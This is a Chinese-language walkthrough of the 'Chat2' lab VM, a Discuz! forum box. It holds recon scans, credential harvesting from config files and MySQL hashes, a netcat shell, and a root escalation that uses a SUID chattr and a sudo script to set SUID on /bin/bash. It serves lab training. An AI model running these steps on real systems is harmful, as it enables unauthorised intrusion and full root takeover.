Chat2

靶机说明

• QQ群：660930334
• WP参考：https://7r1umphk.github.io/post/nei-bu-_Chat2.html

一、信息收集

1、主机探测

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.0014s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:10:EF:B6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.69
Host is up (0.0016s latency).
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

靶机IP：192.168.2.69

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:13 CST
Nmap scan report for 192.168.2.69
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 47.83 seconds

开放端口：22,80

2.详细信息扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.69 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:14 CST
Nmap scan report for 192.168.2.69
Host is up (0.00085s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Discuz! X3.5
| http-robots.txt: 20 disallowed entries (15 shown)
| /api/ /data/ /source/ /install/ /template/default/ 
| /config/ /uc_client/ /uc_server/ /admin.php /search.php 
| /member.php /api.php /misc.php /connect.php 
|_/forum.php?mod=redirect*
|_http-title: \xE8\xAE\xBA\xE5\x9D\x9B -  Powered by Discuz!
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

1. 22端口:ssh服务，版本为OpenSSH 8.4p1
2. 80端口:http服务，版本为Apache httpd 2.4.62，存在目录/robots.txt，框架为Discuz

3.udp端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.69                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:15 CST
Nmap scan report for 192.168.2.69
Host is up (0.0017s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 101.13 seconds

没有开放的端口

4.漏洞脚本扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80 192.168.2.69                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-20 16:18 CST
Nmap scan report for 192.168.2.69
Host is up (0.0011s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.2.69
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.2.69:80/
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=%E6%B4%BB%E5%8A%A8&formhash=a8c08364&searchsubmit=true&source=hotsearch
|     Form id: searchlogo
|     Form action: search.php?mod=forum
|     
|     Path: http://192.168.2.69:80/forum.php
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?showmobile=yes
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?showmobile=yes
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/search.php?searchsubmit=yes
|     Form id: searchlogo
|     Form action: search.php?mod=forum
|     
|     Path: http://192.168.2.69:80/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/search.php?mod=forum&srchtxt=discuz&formhash=a8c08364&searchsubmit=true&source=hotsearch
|     Form id: searchlogo
|     Form action: search.php?mod=forum
|     
|     Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=redirect&tid=1&goto=lastpost
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&username=admin
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&username=admin
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=misc&action=showdarkroom
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&do=friend&view=online&type=member
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&username=admin
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/home.php?mod=space&username=admin
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
|     Form id: lsform
|     Form action: member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
|     Form id: scbar_form
|     Form action: search.php?searchsubmit=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
|     Form id: moderate
|     Form action: forum.php?mod=topicadmin&action=moderate&fid=2&infloat=yes&nopost=yes
|     
|     Path: http://192.168.2.69:80/forum.php?mod=forumdisplay&fid=2
|     Form id: fastpostform
|_    Form action: forum.php?mod=post&action=newthread&fid=2&topicsubmit=yes&infloat=yes&handlekey=fastnewpost
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-cross-domain-policy: 
|   VULNERABLE:
|   Cross-domain and Client Access policies.
|     State: VULNERABLE
|       A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader,
|       etc. use to access data across different domains. A client acces policy file is similar to cross-domain policy
|       but is used for M$ Silverlight applications. Overly permissive configurations enables Cross-site Request
|       Forgery attacks, and may allow third parties to access sensitive data meant for the user.
|     Check results:
|       /crossdomain.xml:
|   
|   
|   
|   
|         
|     Extra information:
|       Trusted domains:*
|   
|     References:
|       http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html
|       http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html
|       https://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html
|       http://acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file
|       https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_%28OTG-CONFIG-008%29
|_      https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /admin.php: Possible admin folder
|   /robots.txt: Robots file
|_  /crossdomain.xml: Adobe Flash crossdomain policy
MAC Address: 08:00:27:EC:97:DA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.26 seconds

找到新的目录/admin.php、/crossdomain.xml、/robots.txt

3、WEB目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 12443]
/search.php           (Status: 200) [Size: 4988]
/home.php             (Status: 200) [Size: 9316]
/forum.php            (Status: 200) [Size: 12443]
/data                 (Status: 301) [Size: 311] [--> http://192.168.2.69/data/]
/misc.php             (Status: 200) [Size: 33]
/static               (Status: 301) [Size: 313] [--> http://192.168.2.69/static/]
/admin.php            (Status: 200) [Size: 2608]
/member.php           (Status: 200) [Size: 8954]
/portal.php           (Status: 200) [Size: 9039]
/template             (Status: 301) [Size: 315] [--> http://192.168.2.69/template/]
/source               (Status: 301) [Size: 313] [--> http://192.168.2.69/source/]
/group.php            (Status: 200) [Size: 9123]
/install              (Status: 301) [Size: 314] [--> http://192.168.2.69/install/]
/api                  (Status: 301) [Size: 310] [--> http://192.168.2.69/api/]
/api.php              (Status: 200) [Size: 13]
/config               (Status: 301) [Size: 313] [--> http://192.168.2.69/config/]
/connect.php          (Status: 200) [Size: 8944]
/robots.txt           (Status: 200) [Size: 639]
/plugin.php           (Status: 200) [Size: 8950]
/archiver             (Status: 301) [Size: 315] [--> http://192.168.2.69/archiver/]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1345151 / 1764488 (76.23%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1345530 / 1764488 (76.26%)
===============================================================
Finished
===============================================================

二、漏洞渗透

1、WEB信息泄露

访问80端口，发现是Discuz! X3.5论坛

在在线会员模块中存在一个账户admin，同时在默认板块有一篇文章Let's Encrypt，查看该文章发现是一段摩斯编码

.--. .- ... ... .-- --- .-. -.. .---- ..--- ...--

解密摩斯编码，得到明文password123
注意：摩斯密码本身不区分字母大小写，因此在实际爆破或登录尝试时，需要考虑所有可能的大小写组合，如 password123, Password123, PASSWORD123 等。

2、获取WEB管理后台

使用获取到的凭证admin:password123，成功登录到管理后台
在用户界面，找到管理中心入口，再次输入密码进行管理后台

3、获取www-data权限

由于论坛的版本为Discuz! X3.5，搜索后未发现漏洞
查看管理中心界面，在工具-计划任务，找到一个shell.php的自定义任务

尝试编辑该任务，发现无法直接修改其内容，尝试直接执行该任务
执行成功后再次使用nmap扫描端口

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.69                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 16:06 CST
Nmap scan report for chat.dsz (192.168.2.69)
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
12345/tcp open  netbus
MAC Address: 08:00:27:E6:8D:F4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 25.54 seconds

发现新开放了一个端口12345，服务为netbus

尝试直接进行连接

┌──(root㉿kali)-[~]
└─# nc 192.168.2.69 12345                 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功获取到www-data权限

获取稳定的shell

script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

三、权限提升

1、获取discuz权限

1.数据库配置信息

在网站目录下面找到数据库的配置文件，在/config下面找到配置文件config_global.php

www-data@Chat2:/var/www/html/config$ cat config_global.php 
...
// ----------------------------  CONFIG DB  ----------------------------- //
$_config['db'][1]['dbhost'] = '127.0.0.1';
$_config['db'][1]['dbuser'] = 'discuz_user';
$_config['db'][1]['dbpw'] = 'StrongPassword!123';
$_config['db'][1]['dbcharset'] = 'utf8mb4';
$_config['db'][1]['pconnect'] = 0;
$_config['db'][1]['dbname'] = 'discuz_db';
$_config['db'][1]['tablepre'] = 'maze_';
$_config['db']['slave'] = '';
$_config['db']['common']['slave_except_table'] = '';
$_config['db']['common']['engine'] = 'innodb';
...

发现数据库的用户名discuz_user和密码StrongPassword!123

2.数据库信息利用

使用该凭证进入数据库

www-data@Chat2:/var/www/html/config$ mysql -u discuz_user -p'StrongPassword!123'
Welcome to the MariaDB monitor.  Commands end with ; or \g. -p'StrongPassword!123' 
Your MariaDB connection id is 104
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| discuz_db          |
| information_schema |
| mysql              |
+--------------------+
3 rows in set (0.001 sec)

在mysql数据库中找到相关的user和password

MariaDB [mysql]> select user,password from user;
+-------------+-------------------------------------------+
| User        | Password                                  |
+-------------+-------------------------------------------+
| mariadb.sys |                                           |
| root        | invalid                                   |
| mysql       | invalid                                   |
| discuz_user | *CF0058A6F9B624591DDA643E26A401BEBAD3DFD8 |
| hackme      | *FAAFFE644E901CFAFAEC7562415E5FAEC243B8B2 |
+-------------+-------------------------------------------+
5 rows in set (0.001 sec)

使用MD5在线工具进行解密
CF0058A6F9B624591DDA643E26A401BEBAD3DFD8无法解密
FAAFFE644E901CFAFAEC7562415E5FAEC243B8B2解密为root123

3.获取discuz权限

尝试使用密码进行登录

www-data@Chat2:/var/www/html$ su discuz
Password: 
discuz@Chat2:/var/www/html$ id
uid=1000(discuz) gid=1000(discuz) groups=1000(discuz)

成功获取到discuz的权限

2、获取root权限

1.SUID提权向量与文件属性

查看该用户拥有的 sudo 权限

discuz@Chat2:/var/www/html$ sudo -l
Matching Defaults entries for discuz on Chat2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User discuz may run the following commands on Chat2:
    (ALL) NOPASSWD: /home/discuz/chat

discuz 用户可以无密码以root权限执行其家目录下的 chat 程序

查找具有SUID权限位的二进制文件

discuz@Chat2:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chattr
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

/usr/bin/chattr 命令被设置了SUID位

主要思路是替换 /home/discuz/chat 文件为一个恶意脚本，然后通过 sudo 执行它来提权

1. 尝试重命名或删除chat文件时，发现没有权限进行，作为 discuz 用户，对自己家目录下的文件应该有写权限，这通常意味着文件被设置了特殊的扩展属性

   discuz@Chat2:~$ mv chat chat.bak
   mv: cannot move 'chat' to 'chat.bak': Operation not permitted

2. 使用lsattr查看文件属性

   discuz@Chat2:~$ lsattr chat 
   ----i---------e---- chat

   lsattr 命令用于查看文件的扩展属性。这里的 i 属性（immutable）意味着该文件被“锁定”，即便是root用户也无法修改、删除、重命名或创建链接。

2.替换文件并提权

提权思路：

• 利用带SUID的 /usr/bin/chattr 移除 /home/discuz/chat 的 i 属性。
• 将 /home/discuz/chat 替换为我们自己的恶意脚本。
• 通过 sudo 执行修改后的 chat 脚本，以root权限完成提权。
  构造的恶意脚本功能是为 /bin/bash 添加SUID权限位，这样我们就能随时通过 bash -p 获取一个root shell

1. 利用SUID chattr移除 i 属性

   discuz@Chat2:~$ /usr/bin/chattr -i chat

2. 备份原文件并创建恶意脚本

   discuz@Chat2:~$ mv chat chat.bak
   discuz@Chat2:~$ echo 'chmod +s /bin/bash' > chat
   discuz@Chat2:~$ chmod +x chat

3. 检查 /bin/bash 当前权限

   discuz@Chat2:~$ ls -la /bin/bash
   -rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

4. 使用sudo执行我们的脚本

   discuz@Chat2:~$ sudo /home/discuz/chat

5. 再次检查 /bin/bash 权限，确认SUID位已添加

   discuz@Chat2:~$ ls -la /bin/bash
   -rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

   /bin/bash 已经拥有了 rws 权限，SUID位设置成功。

3.获取root权限

执行 bash -p 命令，利用SUID权限获得一个 euid 为 0 (root) 的shell。

discuz@Chat2:~$ bash -p
bash-5.0# id
uid=1000(discuz) gid=1000(discuz) euid=0(root) egid=0(root) groups=0(root),1000(discuz)

四、获取FLAG

bash-5.0# cat /home/discuz/user.txt /root/root.txt 
flag{user-41352be6a84e5910fdef6afec4e41617}
flag{root-099177104a7291ba00f83ab188987c5d}